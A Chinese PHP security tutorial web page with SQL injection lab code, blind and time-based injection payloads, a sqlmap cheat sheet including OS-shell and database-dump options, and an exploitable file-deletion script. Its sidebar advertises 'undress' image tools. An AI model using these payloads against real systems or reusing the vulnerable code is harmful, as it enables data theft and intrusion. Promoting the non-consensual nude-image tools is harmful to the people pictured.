首頁 後端開發 php教程 PHP安全編碼總結(經驗分享)

PHP安全編碼總結(經驗分享)

Jan 20, 2023 pm 02:11 PM
php 安全

本篇文章给大家带来了关于PHP安全的相关知识,其中主要介绍了什么是SQL注入?盲注是怎么使用的?常用检测命令有哪些等等,下面一起来看一下,希望对需要的朋友有所帮助。

PHP安全編碼總結(經驗分享)

PHP 安全编码总结笔记

SQL注入: 代码中的 HTTP_X_FORWARDED_FOR 地址可以被伪造,而REMOTE_ADDR则相对更安全,有些应用程序会将对方IP地址带入数据库查询是否存在,例如同一个IP每天只能注册一个账号等,如果目标代码中使用的是 HTTP_X_FORWARDED_FOR 获取的IP地址,那么攻击者就可以通过修改HTTP包头实现SQL注入攻击。

<?php
function get_client_addr(){
if($_SERVER["HTTP_CLIENT_IP"] && strcasecmp($_SERVER["HTTP_CLIENT_IP"],"unknown")){
$ip = $_SERVER["HTTP_CLIENT_IP"];
echo "HTTP_CLIENT_IP =" . $ip;
}else if($_SERVER["HTTP_X_FORWARDED_FOR"] && strcasecmp($_SERVER["HTTP_X_FORWARDED_FOR"], "unknown")){
$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
echo "HTTP_X_FORWARDED_FOR =" . $ip;
}else if($_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")){
$ip = $_SERVER["REMOTE_ADDR"];
echo "REMOTE_ADDR =" . $ip;
}else{
$ip = "unknown";
}
return $ip;
}
$addr = get_client_addr();
?>
登入後複製

SQL注入: 一种使用了过滤的代码,接受的参数经过过滤,字符串会被过滤掉SQL注入的关键字,整数会被强制转换为整数。

<?php
$var = date_default_timezone_get();
echo "当前时区: " . $var . "<br>";
date_default_timezone_set("Asia/Shanghai");

if(!get_magic_quotes_gpc()){
$var = waf($_GET[&#39;id&#39;]);
echo "过滤后的参数: " . $var;
}

function waf($array){
if(is_array($array)){
foreach ($array as $key => $value) {
$array [$key] = waf($value);
}
}else if(is_string($array)){
$array = addslashes($array);
#$array = str_ireplace("and", "fuck", $array);
$substr = array(
"and" => "fuck you !",
"where" => "fuck you !",
"union" => "fuck you !",
"select" => "fuck you !",
"order" => "fuck you !",
"update" => "fuck you !",
"sleep" => "fuck you !",
);
$array = str_ireplace(array_keys($substr), $substr,$array);
}else if(is_numeric($array)){
$array = intval($array);
}
return $array;
}
?>
登入後複製

盲注的使用

首先需要简单修改上方的源代码,去掉回显框,然后修改以下代码.

<!DOCTYPE html>
<html>
<head>
    <meta charset="gbk">
    <title>SQL 注入测试代码</title>
</head>
        <?php
        $connect = mysqli_connect("localhost","root","123","lyshark");
        if($connect)
        {
                $id = $_GET[&#39;id&#39;];
                if(isset($id))
                {
                        $sql = "select * from users where id=&#39;$id&#39; limit 0,1";
                        $query = mysqli_query($connect,$sql);
                        $row = mysqli_fetch_array($query);
                        if(!empty($row))
                        {
                                print("查询完成了..");
                        }else
                        {
                                print("查询失败");
                        }
                }
        }
        ?>
<body>
        <?php echo &#39;<hr><b> 后端执行SQL语句:  </b>&#39; . $sql;  ?>
</body>
</html>
登入後複製

猜数据库名称: 盲注也就是程序会返回两种状态,查询成功与查询失败,我们需要自己构建判断条件,常用语句如下.

index.php?id=1&#39; and left(version(),1)=5 --+            // 返回正常,说明版本号是5
index.php?id=1&#39; and (length(database()))=7 --+         // 返回正常,说明数据库名字长度是7

index.php?id=1&#39; and (left(database(),1))=&#39;l&#39; --+       // 返回正常,说明数据库第一位是l
index.php?id=1&#39; and (left(database(),2))=&#39;ly&#39; --+      // 返回正常,说明数据库前两位位是ly,以此类推

index.php?id=1&#39; and ord(mid((CAST(database() AS CHAR)),1,1))=108 --+  // 验证第一位是否为l
index.php?id=1&#39; and ord(mid((CAST(database() AS CHAR)),2,1))=121 --+  // 验证第二位是否为y,以此类推
登入後複製

猜表名:如果网页返回正常,则说明存在这个表,返回不正常说明不存在.

index.php?id=1&#39; and (select count(*) from mysql.user) >=0     // 存在mysql.user表
index.php?id=1&#39; and (select count(*) from lyshark) >=0        // 存在lyshark表
登入後複製

猜字段: 如果网页返回正常,说明存在猜测的字段,不正常则需要继续猜.

index.php?id=1&#39; and (select count(id) from users) >=0       // 返回正常说明存在id字段
index.php?id=1&#39; and (select count(name) from users) >=0     // 返回不正常不存在name字段
index.php?id=1&#39; and (select count(*) from lyshark) >=3 #--   // 返回表中记录数
登入後複製

用户名猜测: 通过正则符号也可使完成多指定用户的探测,其他函数用法相同.

index.php?id=1&#39; and (length(user())) >=14 #                // 猜测数据库用户名称长度
index.php?id=1&#39; and (select user() like &#39;root%&#39;) #         // 猜测用户名
index.php?id=1&#39; and (select user() regexp &#39;^[a-z]&#39;) #      // 猜测开头a-z
index.php?id=1&#39; and (select user() regexp &#39;^r&#39;) #          // 第一位是r
index.php?id=1&#39; and (select user() regexp &#39;^ro&#39;) #         // 第二位是o
index.php?id=1&#39; and (select user() regexp &#39;^root&#39;) #       // 以此类推猜测前四位
登入後複製

延时注入: 通过sleep(5)延时的方式,我们同样可以判断是否存在注入点.

index.php?id=1&#39; and sleep(5) #
index.php?id=1&#39; and sleep(5) order by 3 #                       // 如果是3个字段,则会延时5秒
index.php?id=1&#39; and select if(length(user())=0,sleep(3),1) #    //如果user=0则延时3秒
index.php?id=1&#39; and if(hex(mid(user(),1,1))=100,sleep(3),1) #   // 第1个字符=d则延时3秒
index.php?id=1&#39; and if(hex(mid(user(),1,1))=118,sleep(3),1) #   // 第2个字符=v则延时3秒
登入後複製

◆sqlmap 命令◆

常用检测命令:

sqlmap -u "./index.php?id=1" -v 3                   # 显示攻击载荷
sqlmap -u "./index.php?id=1" --level=3              # 指定探测级别
sqlmap -u "./index.php?id=1" --privileges           # 测试所有用户权限
sqlmap -u "./index.php?id=1" --privileges root      # 测试root用户权限
sqlmap -u "./index.php?id=1" --all                  # 查询所有数据库
sqlmap -u "./index.php?id=1" --hostname             # 查询当前主机名
sqlmap -u "./index.php?id=1" --is-dba               # 判断root权限
sqlmap -u "./index.php?id=1" --users                # 枚举数据库用户
sqlmap -u "./index.php?id=1" --random-agent         # 随机User-Agent
sqlmap -u "./index.php?id=1" --output-dir=""        # 自定义输出目录
sqlmap -u "./index.php?id=1" --file-read=""         # 读取文件
sqlmap -u "./index.php?id=1" --file-write=""        # 写入操作
sqlmap -u "./index.php?id=1" --os-cmd="net user"    # 执行一条命令
sqlmap -u "./index.php?id=1" --os-shell             # 交互执行命令
sqlmap -u "./index.php?id=1" --sql-query=""         # 执行的SQL语句
sqlmap -u "./index.php?id=1" --cookie=""            # 指定cookie
sqlmap -u "./index.php?id=1" --temper=""            # 指定过滤脚本
sqlmap -u "./index.php?id=1" --dbs --delay 1        # 延时1秒后注入
sqlmap -u "./index.php?id=1" --dbs --safe-freq 3    # 延时3秒后注入

sqlmap -u "./index.php?id=1" --identify-waf                  # 测试是否有WAF
sqlmap -u "./index.php?id=1" --current-db                    # 查询当前数据库
sqlmap -u "./index.php?id=1" --current-user                  # 查询当前主机名
sqlmap -u "./index.php?id=1" --users                         # 查询所有用户名
sqlmap -u "./index.php?id=1" --dbs                           # 列出所有数据库
sqlmap -u "./index.php?id=1" --tables                        # 列出所有的表

sqlmap -u "./index.php?id=1" -D "mysql" --tables             # 获取mysql库中的表
sqlmap -u "./index.php?id=1" -D "mysql" -T "host" --columns  # 获取mysql.host表列名称
sqlmap -u "./index.php?id=1" -D "mysql" -T "host" --dump     # 将mysql.host保存到本地
sqlmap -u "./index.php?id=1" -D "mysql" --dump-all           # 全部脱裤
sqlmap -u "./index.php?id=1" -D "mysql" -T "user" -C "Host,User,Password" --dump
登入後複製

Cookie注入: 当level>=2时,使用cookie注入,level >=3 使用User-agent/Referer注入.

sqlmap -u "./index.php" -v 3 --cookie id=1 --level 2                        #判断注入点
sqlmap -u "./index.php" -v 3 --cookie id=1 --dbs --level 2                  #猜数据库名
sqlmap -u "./index.php" -v 3 --cookie id=1 --tables --level 2               #猜表名称
sqlmap -u "./index.php" -v 3 --cookie id=1 -T 表名 --clumns --level 2        #猜字段
sqlmap -u "./index.php" -v 3 --cookie id=1 -T 表名 --clumns --dump --level 2 #猜内容
登入後複製

POST注入: 该方法通常是使用抓包工具抓取数据包,然后指定字段进行测试即可.

1.浏览器打开目标地址 http://www.xxx.com/index.php

2.配置burp代理(127.0.0.1:8080) 准备拦截请求

3.点击login表单的submit按钮,或者其他按钮均可

4.这时候Burp会拦截到了我们的登录POST请求

5.把这个post请求复制为txt,记录下其中的 id=1&Submit=Submit

sqlmap -r post.txt -p id --dbs
Sqlmap -r post.txt -p id -D mysql --tables
Sqlmap -r post.txt -p id -D mysql -T user --columns
sqlmap -r post.txt -p id -D mysql -T user -C "User,Password" --dump
sqlmap --dbms "mysql" --method "POST" --data "id=1&cat=2"
登入後複製

其他漏洞利用

任意文件删除: 执行删除语句http://php.com/?dir=.....////&file=a.txt 完成漏洞利用.

<?php
$dir = isset($_GET[&#39;dir&#39;]) && trim($_GET[&#39;dir&#39;]) ? str_replace(array(&#39;..\\&#39;, &#39;../&#39;, &#39;./&#39;, &#39;.\\&#39;), &#39;&#39;, urldecode(trim($_GET[&#39;dir&#39;]))) : &#39;&#39;;
$dir = str_replace("-", "/", $dir);
$file = isset($_GET[&#39;file&#39;]) && trim($_GET[&#39;file&#39;]) ? trim($_GET[&#39;file&#39;]) : &#39;&#39;;
$path = "./" . $dir . "/" . $file;
$path = str_replace(array("//"), array("/"), $path);
echo "当前路径是: " . $path . "<br>";
if (file_exists($path)) {
if (unlink($path)) {
    echo "删除完成..";
} else {
    echo "删除失败..";
}
}
?>
登入後複製

推荐学习:《PHP视频教程

以上是PHP安全編碼總結(經驗分享)的詳細內容。更多資訊請關注PHP中文網其他相關文章!

本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

Video Face Swap

Video Face Swap

使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

熱工具

記事本++7.3.1

記事本++7.3.1

好用且免費的程式碼編輯器

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用

禪工作室 13.0.1

禪工作室 13.0.1

強大的PHP整合開發環境

Dreamweaver CS6

Dreamweaver CS6

視覺化網頁開發工具

SublimeText3 Mac版

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)

在PHP API中說明JSON Web令牌(JWT)及其用例。 在PHP API中說明JSON Web令牌(JWT)及其用例。 Apr 05, 2025 am 12:04 AM

JWT是一種基於JSON的開放標準,用於在各方之間安全地傳輸信息,主要用於身份驗證和信息交換。 1.JWT由Header、Payload和Signature三部分組成。 2.JWT的工作原理包括生成JWT、驗證JWT和解析Payload三個步驟。 3.在PHP中使用JWT進行身份驗證時,可以生成和驗證JWT,並在高級用法中包含用戶角色和權限信息。 4.常見錯誤包括簽名驗證失敗、令牌過期和Payload過大,調試技巧包括使用調試工具和日誌記錄。 5.性能優化和最佳實踐包括使用合適的簽名算法、合理設置有效期、

您如何在PHP中解析和處理HTML/XML? 您如何在PHP中解析和處理HTML/XML? Feb 07, 2025 am 11:57 AM

本教程演示瞭如何使用PHP有效地處理XML文檔。 XML(可擴展的標記語言)是一種用於人類可讀性和機器解析的多功能文本標記語言。它通常用於數據存儲

解釋PHP中的晚期靜態綁定(靜態::)。 解釋PHP中的晚期靜態綁定(靜態::)。 Apr 03, 2025 am 12:04 AM

靜態綁定(static::)在PHP中實現晚期靜態綁定(LSB),允許在靜態上下文中引用調用類而非定義類。 1)解析過程在運行時進行,2)在繼承關係中向上查找調用類,3)可能帶來性能開銷。

php程序在字符串中計數元音 php程序在字符串中計數元音 Feb 07, 2025 pm 12:12 PM

字符串是由字符組成的序列,包括字母、數字和符號。本教程將學習如何使用不同的方法在PHP中計算給定字符串中元音的數量。英語中的元音是a、e、i、o、u,它們可以是大寫或小寫。 什麼是元音? 元音是代表特定語音的字母字符。英語中共有五個元音,包括大寫和小寫: a, e, i, o, u 示例 1 輸入:字符串 = "Tutorialspoint" 輸出:6 解釋 字符串 "Tutorialspoint" 中的元音是 u、o、i、a、o、i。總共有 6 個元

什麼是PHP魔術方法(__ -construct,__destruct,__call,__get,__ set等)並提供用例? 什麼是PHP魔術方法(__ -construct,__destruct,__call,__get,__ set等)並提供用例? Apr 03, 2025 am 12:03 AM

PHP的魔法方法有哪些? PHP的魔法方法包括:1.\_\_construct,用於初始化對象;2.\_\_destruct,用於清理資源;3.\_\_call,處理不存在的方法調用;4.\_\_get,實現動態屬性訪問;5.\_\_set,實現動態屬性設置。這些方法在特定情況下自動調用,提升代碼的靈活性和效率。

PHP和Python:比較兩種流行的編程語言 PHP和Python:比較兩種流行的編程語言 Apr 14, 2025 am 12:13 AM

PHP和Python各有優勢,選擇依據項目需求。 1.PHP適合web開發,尤其快速開發和維護網站。 2.Python適用於數據科學、機器學習和人工智能,語法簡潔,適合初學者。

PHP:網絡開發的關鍵語言 PHP:網絡開發的關鍵語言 Apr 13, 2025 am 12:08 AM

PHP是一種廣泛應用於服務器端的腳本語言,特別適合web開發。 1.PHP可以嵌入HTML,處理HTTP請求和響應,支持多種數據庫。 2.PHP用於生成動態網頁內容,處理表單數據,訪問數據庫等,具有強大的社區支持和開源資源。 3.PHP是解釋型語言,執行過程包括詞法分析、語法分析、編譯和執行。 4.PHP可以與MySQL結合用於用戶註冊系統等高級應用。 5.調試PHP時,可使用error_reporting()和var_dump()等函數。 6.優化PHP代碼可通過緩存機制、優化數據庫查詢和使用內置函數。 7

說明匹配表達式(PHP 8)及其與開關的不同。 說明匹配表達式(PHP 8)及其與開關的不同。 Apr 06, 2025 am 12:03 AM

在PHP8 中,match表達式是一種新的控制結構,用於根據表達式的值返回不同的結果。 1)它類似於switch語句,但返回值而非執行語句塊。 2)match表達式使用嚴格比較(===),提升了安全性。 3)它避免了switch語句中可能的break遺漏問題,增強了代碼的簡潔性和可讀性。

See all articles